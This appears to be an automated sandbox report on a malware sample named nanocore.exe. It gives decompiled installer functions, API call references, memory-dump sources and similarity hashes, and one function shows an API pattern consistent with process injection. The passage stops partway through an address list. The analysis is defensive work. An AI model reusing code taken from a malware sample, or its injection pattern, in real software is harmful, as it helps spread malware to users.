            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-47812868
            • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
            • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








            0x004056c3
            0x004056c9
            0x004056ca
            0x004056ca
            0x004056cb
            0x004056d2
            0x004056dc
            0x004056e9
            0x004056ec
            0x004056f4
            0x00000000
            0x00000000
            0x004056f8
            0x00000000
            0x00000000
            0x004056fa
            0x00000000
            0x004056fa
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 004056D2
            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,C:\Users\user\Desktop\nanocore.exe 0,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
            • nsa, xrefs: 004056CB
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
            • API String ID: 1716503409-3657371456
            • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
            • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB0034, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02CB0387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02CB03AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CB03CE
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: 01d20345cfe282516aa3efc90a2496fdb251b9222e4999a0c22c2eee8a04846a
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 06321731E40258EFEB21CBA4DC55BEEB7B5BF48705F20409AE608FA2A0D7705A85DF15
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












            0x0040136e
            0x004013fb
            0x00401382
            0x00401384
            0x00401387
            0x00000000
            0x00000000
            0x00401389
            0x0040138a
            0x0040138f
            0x00401394
            0x00000000
            0x00401409
            0x00401396
            0x00401398
            0x004013a6
            0x004013ab
            0x004013ab
            0x004013ad
            0x004013b5
            0x004013b6
            0x004013b8
            0x004013ba
            0x004013ba
            0x004013af
            0x004013b1
            0x004013b2
            0x004013b2
            0x004013bc
            0x004013c1
            0x004013c3
            0x004013c9
            0x004013d2
            0x004013d7
            0x004013d7
            0x004013f5
            0x004013f5
            0x004013c1
            0x00000000

            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
            • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend
            • String ID: 4@
            • API String ID: 3850602802-2385517874
            • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
            • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("C:\\Users\\jones\\Desktop\\nanocore.exe 0", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






            0x00403117
            0x0040311d
            0x00403123
            0x0040312a
            0x0040312f
            0x00403137
            0x00403143
            0x00403149
            0x0040312d
            0x0040312d
            0x0040312d

            APIs
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0
            • API String ID: 4115351271-1059026561
            • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
            • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





            0x00405694
            0x004056a1
            0x004056b6
            0x004056bc

            APIs
            • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
            • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





            0x004030d1
            0x004030e4
            0x004030ec
            0x00000000
            0x004030f3
            0x00000000
            0x004030f5

            APIs
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
            • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




            0x0040310d
            0x00403113

            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
            • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
            Download Yara Rule
            C-Code - Quality: 93%
            			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































            0x004046c5
            0x004046cb
            0x004046cd
            0x004046d3
            0x004046d9
            0x004046e6
            0x004046ef
            0x004046f2
            0x004046f5
            0x00404916
            0x0040491d
            0x00404931
            0x0040491f
            0x00404921
            0x00404924
            0x00404925
            0x0040492c
            0x0040492c
            0x0040493d
            0x0040494b
            0x0040494e
            0x00404964
            0x004049dc
            0x004049df
            0x004049e1
            0x004049eb
            0x004049f9
            0x004049f9
            0x004049fb
            0x00404a05
            0x00404a0b
            0x00404a2c
            0x00404a0d
            0x00404a1a
            0x00404a1a
            0x00404a0b
            0x00404a05
            0x00000000
            0x004049df
            0x00404969
            0x00404974
            0x00404979
            0x00404980
            0x00404987
            0x00404991
            0x00404991
            0x00404995
            0x0040499a
            0x0040499f
            0x004049b5
            0x004049a1
            0x004049a1
            0x004049a9
            0x004049b0
            0x004049ab
            0x004049ab
            0x004049ab
            0x004049a9
            0x004049b9
            0x004049bb
            0x004049c9
            0x004049ca
